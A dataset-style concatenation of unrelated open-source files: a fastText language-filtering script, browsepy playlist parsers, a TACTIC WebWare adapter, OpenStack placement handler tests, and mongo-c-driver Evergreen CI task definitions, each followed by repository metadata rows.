# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#!/bin/python
import fasttext
from multiprocessing import Pool
import contextlib
import sys
import argparse
from functools import partial
import io
model = None
def init(model_path):
global model
model = fasttext.load_model(model_path)
def pred(lines):
return lines, [model.predict(line.strip())[0][0][9:] for line in lines]
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--model", type=str, required=True,
help="model to load")
parser.add_argument("--inputs", nargs="+", default=['-'],
help="input files to filter")
parser.add_argument("--langs", nargs="+", required=True,
help="lang ids of each input file")
parser.add_argument("--outputs", nargs="+", default=['-'],
help="path to save lid filtered outputs")
parser.add_argument("--num-workers", type=int, metavar="N", default=10,
help="number of processes in parallel")
args = parser.parse_args()
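# Example invocation (hypothetical file and model names):
#   python fasttext_multi_filter.py --model lid.bin \
#       --inputs train.en train.fr --langs en fr --outputs out.en out.fr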
assert len(args.inputs) == len(args.langs) and len(args.inputs) == len(args.outputs)
with contextlib.ExitStack() as stack:
inputs = [
stack.enter_context(open(input, "r", encoding="utf-8", newline="\n", errors="replace"))
if input != "-" else io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8', errors="replace")
for input in args.inputs
]
outputs = [
stack.enter_context(open(output, "w", encoding="utf-8", newline="\n"))
if output != "-" else sys.stdout
for output in args.outputs
]
with Pool(args.num_workers, initializer=partial(init, args.model)) as p:
skip_cnt = 0
for lines, preds in p.imap(pred, list(zip(*inputs)), chunksize=500):
if not all(a == b for a, b in zip(preds, args.langs)):
skip_cnt += 1
continue
for line, output_h in zip(lines, outputs):
print(line.strip(), file=output_h)
print(f"Skipped {skip_cnt} lines.")
if __name__ == "__main__":
main()
| mit | -9,120,572,381,256,521,000 | 36.142857 | 107 | 0.584188 | false |
dolphx/browsepy | browsepy/plugin/player/playable.py | 1 | 7332 |
import sys
import codecs
import os.path
import warnings
from browsepy.compat import range, PY_LEGACY # noqa
from browsepy.file import Node, File, Directory, \
underscore_replace, check_under_base
if PY_LEGACY:
import ConfigParser as configparser
else:
import configparser
ConfigParserBase = (
configparser.SafeConfigParser
if hasattr(configparser, 'SafeConfigParser') else
configparser.ConfigParser
)
class PLSFileParser(object):
'''
ConfigParser wrapper accepting fallback on get for convenience.
This wraps instead of inheriting because ConfigParser is an old-style class (classobj) on Python 2.
'''
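# Minimal usage sketch (mirrors PLSFile._entries further below):
#   parser = PLSFileParser(path)
#   n = parser.getint('playlist', 'NumberOfEntries', None)
#   first = parser.get('playlist', 'File1', None)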
NOT_SET = type('NotSetType', (object,), {})
parser_class = (
configparser.SafeConfigParser
if hasattr(configparser, 'SafeConfigParser') else
configparser.ConfigParser
)
def __init__(self, path):
with warnings.catch_warnings():
# We already know about SafeConfigParser deprecation!
warnings.filterwarnings('ignore', category=DeprecationWarning)
self._parser = self.parser_class()
self._parser.read(path)
def getint(self, section, key, fallback=NOT_SET):
try:
return self._parser.getint(section, key)
except (configparser.NoOptionError, ValueError):
if fallback is self.NOT_SET:
raise
return fallback
def get(self, section, key, fallback=NOT_SET):
try:
return self._parser.get(section, key)
except (configparser.NoOptionError, ValueError):
if fallback is self.NOT_SET:
raise
return fallback
class PlayableBase(File):
extensions = {
'mp3': 'audio/mpeg',
'ogg': 'audio/ogg',
'wav': 'audio/wav',
'm3u': 'audio/x-mpegurl',
'm3u8': 'audio/x-mpegurl',
'pls': 'audio/x-scpls',
}
@classmethod
def extensions_from_mimetypes(cls, mimetypes):
mimetypes = frozenset(mimetypes)
return {
ext: mimetype
for ext, mimetype in cls.extensions.items()
if mimetype in mimetypes
}
@classmethod
def detect(cls, node, os_sep=os.sep):
basename = node.path.rsplit(os_sep)[-1]
if '.' in basename:
ext = basename.rsplit('.')[-1]
return cls.extensions.get(ext, None)
return None
class PlayableFile(PlayableBase):
mimetypes = ['audio/mpeg', 'audio/ogg', 'audio/wav']
extensions = PlayableBase.extensions_from_mimetypes(mimetypes)
media_map = {mime: ext for ext, mime in extensions.items()}
def __init__(self, **kwargs):
self.duration = kwargs.pop('duration', None)
self.title = kwargs.pop('title', None)
super(PlayableFile, self).__init__(**kwargs)
@property
def title(self):
return self._title or self.name
@title.setter
def title(self, title):
self._title = title
@property
def media_format(self):
return self.media_map[self.type]
class PlayListFile(PlayableBase):
playable_class = PlayableFile
mimetypes = ['audio/x-mpegurl', 'audio/x-mpegurl', 'audio/x-scpls']
extensions = PlayableBase.extensions_from_mimetypes(mimetypes)
@classmethod
def from_urlpath(cls, path, app=None):
original = Node.from_urlpath(path, app)
if original.mimetype == PlayableDirectory.mimetype:
return PlayableDirectory(original.path, original.app)
elif original.mimetype == M3UFile.mimetype:
return M3UFile(original.path, original.app)
if original.mimetype == PLSFile.mimetype:
return PLSFile(original.path, original.app)
return original
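# Playlist entries may be URLs, relative paths or absolute paths: URLs are
# passed through untouched, relative paths are resolved against the
# playlist's directory, and absolute paths outside directory_base are
# rejected (None).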
def normalize_playable_path(self, path):
if '://' in path:
return path
if not os.path.isabs(path):
return os.path.normpath(os.path.join(self.parent.path, path))
if check_under_base(path, self.app.config['directory_base']):
return os.path.normpath(path)
return None
def _entries(self):
return
yield # noqa
def entries(self):
for file in self._entries():
if PlayableFile.detect(file):
yield file
class PLSFile(PlayListFile):
ini_parser_class = PLSFileParser
maxsize = getattr(sys, 'maxsize', None) or getattr(sys, 'maxint', None)
mimetype = 'audio/x-scpls'
extensions = PlayableBase.extensions_from_mimetypes([mimetype])
def _entries(self):
parser = self.ini_parser_class(self.path)
maxsize = parser.getint('playlist', 'NumberOfEntries', None)
for i in range(1, self.maxsize if maxsize is None else maxsize + 1):
path = parser.get('playlist', 'File%d' % i, None)
if not path:
if maxsize:
continue
break
path = self.normalize_playable_path(path)
if not path:
continue
yield self.playable_class(
path=path,
app=self.app,
duration=parser.getint(
'playlist', 'Length%d' % i,
None
),
title=parser.get(
'playlist',
'Title%d' % i,
None
),
)
class M3UFile(PlayListFile):
mimetype = 'audio/x-mpegurl'
extensions = PlayableBase.extensions_from_mimetypes([mimetype])
def _iter_lines(self):
prefix = '#EXTM3U\n'
encoding = 'utf-8' if self.path.endswith('.m3u8') else 'ascii'
with codecs.open(
self.path, 'r',
encoding=encoding,
errors=underscore_replace
) as f:
if f.read(len(prefix)) != prefix:
f.seek(0)
for line in f:
line = line.rstrip('\n')
if line:
yield line
def _entries(self):
data = {}
for line in self._iter_lines():
if line.startswith('#EXTINF:'):
duration, title = line.split(',', 1)
data['duration'] = None if duration == '-1' else int(duration)
data['title'] = title
if not line:
continue
path = self.normalize_playable_path(line)
if path:
yield self.playable_class(path=path, app=self.app, **data)
data.clear()
class PlayableDirectory(Directory):
file_class = PlayableFile
name = ''
@property
def parent(self):
return super(PlayableDirectory, self) # parent is self as directory
@classmethod
def detect(cls, node):
if node.is_directory:
for file in node._listdir():
if PlayableFile.detect(file):
return cls.mimetype
return None
def entries(self):
for file in super(PlayableDirectory, self)._listdir():
if PlayableFile.detect(file):
yield file
def detect_playable_mimetype(path, os_sep=os.sep):
basename = path.rsplit(os_sep)[-1]
if '.' in basename:
ext = basename.rsplit('.')[-1]
return PlayableBase.extensions.get(ext, None)
return None
| mit | 1,423,550,198,939,433,700 | 29.423237 | 79 | 0.575286 | false |
Southpaw-TACTIC/TACTIC | src/pyasm/web/webware_adapter.py | 1 | 4985 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
#
# DEPRECATED
#
__all__ = ['get_app_server', 'get_xmlrpc_server', 'WebWareException', 'WebWare', 'WebWareXmlrpcAdapter']
import types, os
from WebKit.Page import Page
from pyasm.common import Config
from pyasm.web import Url
from web_environment import *
class WebWareException(Exception):
pass
def get_app_server():
'''dynamically load in the appserver classes'''
from app_server import BaseAppServer
from WebKit.Page import Page
class AppServer(Page, BaseAppServer):
def get_adapter(self):
adapter = WebWare(self)
return adapter
def writeHTML(self):
self.writeln( self.get_display() )
return AppServer
def get_xmlrpc_server():
'''dynamically load in an xmlrpc server'''
from WebKit.XMLRPCServlet import XMLRPCServlet
class XmlrpcServer(XMLRPCServlet):
def get_adapter(self):
adapter = WebWareXmlrpcAdapter(self.transaction())
return adapter
return XmlrpcServer
class WebWare(WebEnvironment):
"""Encapsulates webware environment. Implements the web interface"""
def __init__(self,page):
super(WebWare,self).__init__()
self.request = page.request()
self.response = page.response()
def get_context_name(self):
'''this includes all of the subdirectories as well as the main
context'''
dir = self.request.urlPathDir()
# strip of the / at the front and the back
dir = dir.rstrip("/")
dir = dir.lstrip("/")
return dir
# form submission methods
#def reset_form(self):
# return self.request.fields() = {}
def get_form_keys(self):
return self.request.fields().keys()
def has_form_key(self, key):
return key in self.request.fields()
def set_form_value(self, name, value):
'''Set the form value to appear like it was submitted'''
self.request.setField(name, value)
def get_form_values(self, name, raw=False):
"""returns a string list of the values of a form element.
If raw is True, then a nonexistent value returns None"""
if self.request.hasValue(name):
values = self.request.value(name)
if isinstance(values, basestring):
values = values.decode('utf-8')
values = self._process_unicode(values)
return [values]
elif isinstance(values, list):
new_values = []
for value in values:
if isinstance(value, basestring):
value = self._process_unicode(value.decode('utf-8'))
new_values.append(value)
return new_values
else: # this can be a FieldStorage instance
return values
else:
if raw == True:
return None
else:
return []
def get_form_value(self, name, raw=False):
"""returns the string value of the form element.
If raw is True, then a nonexistent value returns None"""
values = self.get_form_values(name,raw)
if values == None:
return None
if values.__class__.__name__ == "FieldStorage":
return values
elif len(values) > 0:
return values[0]
else:
return ""
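# Characters with code points above 128 that cannot be encoded as ASCII are
# replaced with HTML numeric character references (&#NNN;).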
def _process_unicode(self, value):
try:
value = value.encode("ascii")
except:
chars = []
for char in value:
ord_value = ord(char)
if ord_value > 128:
chars.append("&#%s;" % ord(char) )
else:
chars.append(char)
value = "".join(chars)
return value
# cookie methods
def set_cookie(self, name, value):
"""set a cookie"""
self.response.setCookie(name, value, expires="NEVER")
def get_cookie(self, name):
"""get a cookie"""
if self.request.hasCookie(name):
return self.request.cookie(name)
else:
return ""
# environment methods
def get_env_keys(self):
env = self.request.environ()
return env.keys()
def get_env(self, env_var):
env = self.request.environ()
return env.get(env_var)
class WebWareXmlrpcAdapter(WebWare):
def __init__(self, transaction):
# NOTE: the call to WebWare's super is intentional
super(WebWare,self).__init__()
self.request = transaction.request()
self.response = transaction.response()
| epl-1.0 | 7,359,882,747,816,298,000 | 23.800995 | 104 | 0.566901 | false |
phenoxim/nova | nova/tests/unit/api/openstack/placement/test_handler.py | 1 | 7223 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the functions used by the placement API handlers."""
import microversion_parse
import mock
import routes
import webob
from nova.api.openstack.placement import handler
from nova.api.openstack.placement.handlers import root
from nova.api.openstack.placement import microversion
from nova import test
from nova.tests import uuidsentinel
# Used in tests below
def start_response(*args, **kwargs):
pass
def _environ(path='/moo', method='GET'):
return {
'PATH_INFO': path,
'REQUEST_METHOD': method,
'SERVER_NAME': 'example.com',
'SERVER_PORT': '80',
'wsgi.url_scheme': 'http',
# The microversion version value is not used, but it
# needs to be set to avoid a KeyError.
microversion.MICROVERSION_ENVIRON: microversion_parse.Version(1, 12),
}
class DispatchTest(test.NoDBTestCase):
def setUp(self):
super(DispatchTest, self).setUp()
self.mapper = routes.Mapper()
self.route_handler = mock.MagicMock()
def test_no_match_null_map(self):
self.assertRaises(webob.exc.HTTPNotFound,
handler.dispatch,
_environ(), start_response,
self.mapper)
def test_no_match_with_map(self):
self.mapper.connect('/foobar', action='hello')
self.assertRaises(webob.exc.HTTPNotFound,
handler.dispatch,
_environ(), start_response,
self.mapper)
def test_simple_match(self):
self.mapper.connect('/foobar', action=self.route_handler,
conditions=dict(method=['GET']))
environ = _environ(path='/foobar')
handler.dispatch(environ, start_response, self.mapper)
self.route_handler.assert_called_with(environ, start_response)
def test_simple_match_routing_args(self):
self.mapper.connect('/foobar/{id}', action=self.route_handler,
conditions=dict(method=['GET']))
environ = _environ(path='/foobar/%s' % uuidsentinel.foobar)
handler.dispatch(environ, start_response, self.mapper)
self.route_handler.assert_called_with(environ, start_response)
self.assertEqual(uuidsentinel.foobar,
environ['wsgiorg.routing_args'][1]['id'])
class MapperTest(test.NoDBTestCase):
def setUp(self):
super(MapperTest, self).setUp()
declarations = {
'/hello': {'GET': 'hello'}
}
self.mapper = handler.make_map(declarations)
def test_no_match(self):
environ = _environ(path='/cow')
self.assertIsNone(self.mapper.match(environ=environ))
def test_match(self):
environ = _environ(path='/hello')
action = self.mapper.match(environ=environ)['action']
self.assertEqual('hello', action)
def test_405_methods(self):
environ = _environ(path='/hello', method='POST')
result = self.mapper.match(environ=environ)
self.assertEqual(handler.handle_405, result['action'])
self.assertEqual('GET', result['_methods'])
def test_405_headers(self):
environ = _environ(path='/hello', method='POST')
global headers, status
headers = status = None
def local_start_response(*args, **kwargs):
global headers, status
status = args[0]
headers = {header[0]: header[1] for header in args[1]}
handler.dispatch(environ, local_start_response, self.mapper)
allow_header = headers['allow']
self.assertEqual('405 Method Not Allowed', status)
self.assertEqual('GET', allow_header)
# PEP 3333 requires that headers be whatever the native str
# is in that version of Python. Never unicode.
self.assertEqual(str, type(allow_header))
class PlacementLoggingTest(test.NoDBTestCase):
@mock.patch("nova.api.openstack.placement.handler.LOG")
def test_404_no_error_log(self, mocked_log):
environ = _environ(path='/hello', method='GET')
context_mock = mock.Mock()
context_mock.to_policy_values.return_value = {'roles': ['admin']}
environ['placement.context'] = context_mock
app = handler.PlacementHandler()
self.assertRaises(webob.exc.HTTPNotFound,
app, environ, start_response)
mocked_log.error.assert_not_called()
mocked_log.exception.assert_not_called()
class DeclarationsTest(test.NoDBTestCase):
def setUp(self):
super(DeclarationsTest, self).setUp()
self.mapper = handler.make_map(handler.ROUTE_DECLARATIONS)
def test_root_slash_match(self):
environ = _environ(path='/')
result = self.mapper.match(environ=environ)
self.assertEqual(root.home, result['action'])
def test_root_empty_match(self):
environ = _environ(path='')
result = self.mapper.match(environ=environ)
self.assertEqual(root.home, result['action'])
class ContentHeadersTest(test.NoDBTestCase):
def setUp(self):
super(ContentHeadersTest, self).setUp()
self.environ = _environ(path='/')
self.app = handler.PlacementHandler()
def test_no_content_type(self):
self.environ['CONTENT_LENGTH'] = '10'
self.assertRaisesRegex(webob.exc.HTTPBadRequest,
"content-type header required when "
"content-length > 0", self.app,
self.environ, start_response)
def test_non_integer_content_length(self):
self.environ['CONTENT_LENGTH'] = 'foo'
self.assertRaisesRegex(webob.exc.HTTPBadRequest,
"content-length header must be an integer",
self.app, self.environ, start_response)
def test_empty_content_type(self):
self.environ['CONTENT_LENGTH'] = '10'
self.environ['CONTENT_TYPE'] = ''
self.assertRaisesRegex(webob.exc.HTTPBadRequest,
"content-type header required when "
"content-length > 0", self.app,
self.environ, start_response)
def test_empty_content_length_and_type_works(self):
self.environ['CONTENT_LENGTH'] = ''
self.environ['CONTENT_TYPE'] = ''
self.app(self.environ, start_response)
def test_content_length_and_type_works(self):
self.environ['CONTENT_LENGTH'] = '10'
self.environ['CONTENT_TYPE'] = 'foo'
self.app(self.environ, start_response)
| apache-2.0 | -6,712,546,996,518,206,000 | 36.231959 | 78 | 0.618856 | false |
stianstr/autodeploy | autodeploy/Api.py | 1 | 3374 | from DependencyContainer import DependencyContainer
from Deployer import AlreadyDeployed
import traceback
dc = DependencyContainer()
# Step 1 - Check if branch can be deployed
def check(branch, server, user, internalCheck=False):
checker = dc.getDeploymentChecker(server)
result = checker.check(branch)
if not internalCheck:
result = {'check': result, 'result': result['result']}
result['id'] = writeResult('check', branch, server, result, user)
return result
# Step 2 - Deploy branch (then observe if everything is ok)
def deploy(branch, server, user):
result = {}
try:
checkDetails = check(branch, server, user, internalCheck=True)
if not checkDetails['result']:
result = {
'result': False,
'message': 'Check failed',
'check': checkDetails,
'exception': None
}
else:
deployer = dc.getDeployer(server)
try:
deployer.deploy(branch)
result = {
'result': True,
'message': 'Deployed',
'exception': None,
'check': checkDetails
}
except AlreadyDeployed, e:
result = {
'result': False,
'message': 'Already deployed',
'exception': None,
'check': {}
}
except Exception, e:
result = {
'result': False,
'message': e.message,
'exception': traceback.format_exc(),
'check': {}
}
result['id'] = writeResult('deploy', branch, server, result, user)
return result
# Step 3 - Merge branch into master and switch server to master
def merge(branch, server, user):
# todo: sanity-check
lister = dc.getBranchLister()
if not lister.exists(branch):
result = {'check': {}, 'result': False, 'message': 'No such branch'}
else:
try:
merger = dc.getBranchMerger()
merger.merge(branch)
deployer = dc.getDeployer(server)
deployer.deploy('master')
result = {'check': {}, 'result': True}
except Exception, e:
result = {'check': {}, 'result': False}
_exceptionToResult(e, result)
result['id'] = writeResult('merge', branch, server, result, user)
return result
# meh, duplicated elsewhere
def _exceptionToResult(exception, result):
lines = exception.message.split('\n')
for line in lines:
line = line.strip()
if line:
result['message'] = line
break
#result['exception'] = '%s: %s' % (exception.__class__, exception.message)
result['exception'] = traceback.format_exc()
def getServers():
servers = dc.config['servers']
for server in servers:
bc = dc.getRemoteBranchChecker(server['alias'])
server['branch'] = bc.get()
return servers
def getBranches():
bl = dc.getBranchLister()
return bl.list()
def writeResult(type, branch, server, data, user):
data['user'] = user
data['type'] = type
data['branch'] = branch
data['server'] = server
print 'DATA: %s' % data
o = dc.getResultWriter()
return o.write(data)
| mit | 2,985,443,141,897,539,600 | 29.396396 | 78 | 0.546829 | false |
derickr/mongo-c-driver | build/evergreen_config_lib/tasks.py | 1 | 29912 | # Copyright 2018-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict as OD
from itertools import chain
try:
# Python 3 abstract base classes.
import collections.abc as abc
except ImportError:
import collections as abc
from evergreen_config_generator.functions import (
bootstrap, func, run_tests, s3_put)
from evergreen_config_generator.tasks import (
both_or_neither, FuncTask, MatrixTask, NamedTask, prohibit, require, Task)
from evergreen_config_lib import shell_mongoc
class CompileTask(NamedTask):
def __init__(self, task_name, tags=None, config='debug',
compression='default', continue_on_err=False,
extra_commands=None, depends_on=None, **kwargs):
super(CompileTask, self).__init__(task_name=task_name,
depends_on=depends_on,
tags=tags,
**kwargs)
self.extra_commands = extra_commands or []
# Environment variables for .evergreen/compile.sh.
self.compile_sh_opt = kwargs
if config == 'debug':
self.compile_sh_opt['DEBUG'] = 'ON'
else:
assert config == 'release'
self.compile_sh_opt['RELEASE'] = 'ON'
if compression != 'default':
self.compile_sh_opt['SNAPPY'] = (
'ON' if compression in ('all', 'snappy') else 'OFF')
self.compile_sh_opt['ZLIB'] = (
'BUNDLED' if compression in ('all', 'zlib') else 'OFF')
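# e.g. compression='zlib' yields SNAPPY=OFF, ZLIB=BUNDLED;
# compression='all' yields SNAPPY=ON, ZLIB=BUNDLED.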
self.continue_on_err = continue_on_err
def to_dict(self):
task = super(CompileTask, self).to_dict()
script = ''
for opt, value in sorted(self.compile_sh_opt.items()):
script += 'export %s="%s"\n' % (opt, value)
script += "CC='${CC}' MARCH='${MARCH}' sh .evergreen/compile.sh"
task['commands'].append(shell_mongoc(script))
task['commands'].append(func('upload build'))
task['commands'].extend(self.extra_commands)
return task
class SpecialTask(CompileTask):
def __init__(self, *args, **kwargs):
super(SpecialTask, self).__init__(*args, **kwargs)
self.add_tags('special')
class LinkTask(NamedTask):
def __init__(self, task_name, extra_commands, orchestration=True, **kwargs):
if orchestration == 'ssl':
bootstrap_commands = [bootstrap(SSL=1)]
elif orchestration:
bootstrap_commands = [bootstrap()]
else:
bootstrap_commands = []
super(LinkTask, self).__init__(
task_name=task_name,
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=bootstrap_commands + extra_commands,
**kwargs)
all_tasks = [
NamedTask('check-public-headers',
commands=[shell_mongoc('sh ./.evergreen/check-public-headers.sh')]),
FuncTask('make-release-archive',
'release archive', 'upload docs', 'upload man pages',
'upload release', 'upload build'),
CompileTask('hardened-compile',
tags=['hardened'],
compression=None,
CFLAGS='-fno-strict-overflow -D_FORTIFY_SOURCE=2 -fstack-protector-all -fPIE -O',
LDFLAGS='-pie -Wl,-z,relro -Wl,-z,now'),
FuncTask('abi-compliance-check', 'abi report'),
CompileTask('debug-compile-compression-zlib',
tags=['zlib', 'compression'],
compression='zlib'),
CompileTask('debug-compile-compression-snappy',
tags=['snappy', 'compression'],
compression='snappy'),
CompileTask('debug-compile-compression',
tags=['zlib', 'snappy', 'compression'],
compression='all'),
CompileTask('debug-compile-no-align',
tags=['debug-compile'],
compression='zlib',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF"),
CompileTask('debug-compile-nosasl-nossl',
tags=['debug-compile', 'nosasl', 'nossl']),
CompileTask('debug-compile-lto', CFLAGS='-flto'),
CompileTask('debug-compile-lto-thin', CFLAGS='-flto=thin'),
SpecialTask('debug-compile-c11',
tags=['debug-compile', 'c11', 'stdflags'],
CFLAGS='-std=c11 -D_XOPEN_SOURCE=600'),
SpecialTask('debug-compile-c99',
tags=['debug-compile', 'c99', 'stdflags'],
CFLAGS='-std=c99 -D_XOPEN_SOURCE=600'),
SpecialTask('debug-compile-c89',
tags=['debug-compile', 'c89', 'stdflags'],
CFLAGS='-std=c89 -D_POSIX_C_SOURCE=200112L -pedantic'),
SpecialTask('debug-compile-valgrind',
tags=['debug-compile', 'valgrind'],
SASL='OFF',
SSL='OPENSSL',
VALGRIND='ON',
CFLAGS='-DBSON_MEMCHECK'),
SpecialTask('debug-compile-coverage',
tags=['debug-compile', 'coverage'],
COVERAGE='ON',
extra_commands=[func('upload coverage')]),
CompileTask('debug-compile-no-counters',
tags=['debug-compile', 'no-counters'],
ENABLE_SHM_COUNTERS='OFF'),
SpecialTask('debug-compile-asan-clang',
tags=['debug-compile', 'asan-clang'],
compression='zlib',
CC='clang-3.8',
CFLAGS='-fsanitize=address -fno-omit-frame-pointer'
' -DBSON_MEMCHECK',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS='-DENABLE_EXTRA_ALIGNMENT=OFF',
PATH='/usr/lib/llvm-3.8/bin:$PATH'),
# include -pthread in CFLAGS on gcc to address the issue explained here:
# https://groups.google.com/forum/#!topic/address-sanitizer/JxnwgrWOLuc
SpecialTask('debug-compile-asan-gcc',
compression='zlib',
CFLAGS='-fsanitize=address -pthread',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF"),
SpecialTask('debug-compile-asan-clang-openssl',
tags=['debug-compile', 'asan-clang'],
compression='zlib',
CC='clang-3.8',
CFLAGS='-fsanitize=address -fno-omit-frame-pointer'
' -DBSON_MEMCHECK',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF",
PATH='/usr/lib/llvm-3.8/bin:$PATH',
SSL='OPENSSL'),
SpecialTask('debug-compile-ubsan',
compression='zlib',
CC='clang-3.8',
CFLAGS='-fsanitize=undefined -fno-omit-frame-pointer'
' -DBSON_MEMCHECK',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF",
PATH='/usr/lib/llvm-3.8/bin:$PATH'),
SpecialTask('debug-compile-scan-build',
tags=['clang', 'debug-compile', 'scan-build'],
continue_on_err=True,
ANALYZE='ON',
CC='clang',
extra_commands=[
func('upload scan artifacts'),
shell_mongoc('''
if find scan -name \*.html | grep -q html; then
exit 123
fi''')]),
CompileTask('compile-tracing',
TRACING='ON'),
CompileTask('release-compile',
config='release',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')])),
CompileTask('debug-compile-nosasl-openssl',
tags=['debug-compile', 'nosasl', 'openssl'],
SSL='OPENSSL'),
CompileTask('debug-compile-nosasl-darwinssl',
tags=['debug-compile', 'nosasl', 'darwinssl'],
SSL='DARWIN'),
CompileTask('debug-compile-nosasl-winssl',
tags=['debug-compile', 'nosasl', 'winssl'],
SSL='WINDOWS'),
CompileTask('debug-compile-sasl-nossl',
tags=['debug-compile', 'sasl', 'nossl'],
SASL='AUTO',
SSL='OFF'),
CompileTask('debug-compile-sasl-openssl',
tags=['debug-compile', 'sasl', 'openssl'],
SASL='AUTO',
SSL='OPENSSL'),
CompileTask('debug-compile-sasl-darwinssl',
tags=['debug-compile', 'sasl', 'darwinssl'],
SASL='AUTO',
SSL='DARWIN'),
CompileTask('debug-compile-sasl-winssl',
tags=['debug-compile', 'sasl', 'winssl'],
SASL='AUTO',
SSL='WINDOWS'),
CompileTask('debug-compile-sspi-nossl',
tags=['debug-compile', 'sspi', 'nossl'],
SASL='SSPI',
SSL='OFF'),
CompileTask('debug-compile-sspi-openssl',
tags=['debug-compile', 'sspi', 'openssl'],
SASL='SSPI',
SSL='OPENSSL'),
CompileTask('debug-compile-rdtscp',
ENABLE_RDTSCP='ON'),
CompileTask('debug-compile-sspi-winssl',
tags=['debug-compile', 'sspi', 'winssl'],
SASL='SSPI',
SSL='WINDOWS'),
CompileTask('debug-compile-nosrv',
tags=['debug-compile'],
SRV='OFF'),
LinkTask('link-with-cmake',
extra_commands=[
func('link sample program', BUILD_SAMPLE_WITH_CMAKE=1)]),
LinkTask('link-with-cmake-ssl',
extra_commands=[
func('link sample program',
BUILD_SAMPLE_WITH_CMAKE=1,
ENABLE_SSL=1)]),
LinkTask('link-with-cmake-snappy',
extra_commands=[
func('link sample program',
BUILD_SAMPLE_WITH_CMAKE=1,
ENABLE_SNAPPY=1)]),
LinkTask('link-with-cmake-mac',
extra_commands=[
func('link sample program', BUILD_SAMPLE_WITH_CMAKE=1)]),
LinkTask('link-with-cmake-windows',
extra_commands=[func('link sample program MSVC')]),
LinkTask('link-with-cmake-windows-ssl',
extra_commands=[func('link sample program MSVC', ENABLE_SSL=1)],
orchestration='ssl'),
LinkTask('link-with-cmake-windows-snappy',
extra_commands=[
func('link sample program MSVC', ENABLE_SNAPPY=1)]),
LinkTask('link-with-cmake-mingw',
extra_commands=[func('link sample program mingw')]),
LinkTask('link-with-pkg-config',
extra_commands=[func('link sample program')]),
LinkTask('link-with-pkg-config-mac',
extra_commands=[func('link sample program')]),
LinkTask('link-with-pkg-config-ssl',
extra_commands=[func('link sample program', ENABLE_SSL=1)]),
LinkTask('link-with-bson',
extra_commands=[func('link sample program bson')],
orchestration=False),
LinkTask('link-with-bson-mac',
extra_commands=[func('link sample program bson')],
orchestration=False),
LinkTask('link-with-bson-windows',
extra_commands=[func('link sample program MSVC bson')],
orchestration=False),
LinkTask('link-with-bson-mingw',
extra_commands=[func('link sample program mingw bson')],
orchestration=False),
NamedTask('debian-package-build',
commands=[
shell_mongoc('export IS_PATCH="${is_patch}"\n'
'sh .evergreen/debian_package_build.sh'),
s3_put(local_file='deb.tar.gz',
remote_file='${branch_name}/mongo-c-driver-debian-packages-${CURRENT_VERSION}.tar.gz',
content_type='${content_type|application/x-gzip}')]),
NamedTask('rpm-package-build',
commands=[
shell_mongoc('sh .evergreen/build_snapshot_rpm.sh'),
s3_put(local_file='rpm.tar.gz',
remote_file='${branch_name}/mongo-c-driver-rpm-packages-${CURRENT_VERSION}.tar.gz',
content_type='${content_type|application/x-gzip}')]),
NamedTask('install-uninstall-check-mingw',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=[shell_mongoc(r'''
export CC="C:/mingw-w64/x86_64-4.9.1-posix-seh-rt_v3-rev1/mingw64/bin/gcc.exe"
BSON_ONLY=1 cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd
cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd''')]),
NamedTask('install-uninstall-check-msvc',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=[shell_mongoc(r'''
export CC="Visual Studio 14 2015 Win64"
BSON_ONLY=1 cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd
cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd''')]),
NamedTask('install-uninstall-check',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=[shell_mongoc(r'''
DESTDIR="$(pwd)/dest" sh ./.evergreen/install-uninstall-check.sh
BSON_ONLY=1 sh ./.evergreen/install-uninstall-check.sh
sh ./.evergreen/install-uninstall-check.sh''')]),
]
class IntegrationTask(MatrixTask):
axes = OD([('valgrind', ['valgrind', False]),
('asan', ['asan', False]),
('coverage', ['coverage', False]),
('version', ['latest', '4.0', '3.6', '3.4', '3.2', '3.0']),
('topology', ['server', 'replica_set', 'sharded_cluster']),
('auth', [True, False]),
('sasl', ['sasl', 'sspi', False]),
('ssl', ['openssl', 'darwinssl', 'winssl', False])])
def __init__(self, *args, **kwargs):
super(IntegrationTask, self).__init__(*args, **kwargs)
if self.valgrind:
self.add_tags('test-valgrind')
self.options['exec_timeout_secs'] = 7200
elif self.coverage:
self.add_tags('test-coverage')
self.options['exec_timeout_secs'] = 3600
elif self.asan:
self.add_tags('test-asan')
self.options['exec_timeout_secs'] = 3600
else:
self.add_tags(self.topology,
self.version,
